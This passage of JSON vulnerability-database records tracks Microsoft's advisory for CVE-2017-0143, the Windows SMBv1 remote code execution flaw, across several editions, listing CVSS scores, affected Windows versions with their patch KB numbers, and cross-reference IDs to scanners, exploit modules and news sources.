"kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T06:46:35", "differentElements": ["msAffectedSoftware"], "edition": 11}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-05T08:49:10", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-05T08:49:10", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-05T08:49:10", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012217", "KB4012212", "KB3213986", "KB3210720", "KB4012606", "KBMS16-110, 3187754", "KB3205401", "KB3205409", "KB3212646", "KB3210721", "KB4012214", "KB3177186", "KB4012215", "KB4012213", "KB4012216", "KB4013198", "KB4013429", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T08:49:10", "differentElements": ["msAffectedSoftware"], "edition": 12}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-05T18:46:16", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-05T18:46:16", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-05T18:46:16", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB3210720", "KB3210721", "KB3212646", "KB4013198", "KB4013429", "KB4012217", "KBMS16-110, 3187754", "KB4012216", "KB3205401", "KB4012212", "KB4012606", "KB4012598", "KB3205409", "KB4012215", "KB3177186", "KB4012213", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": 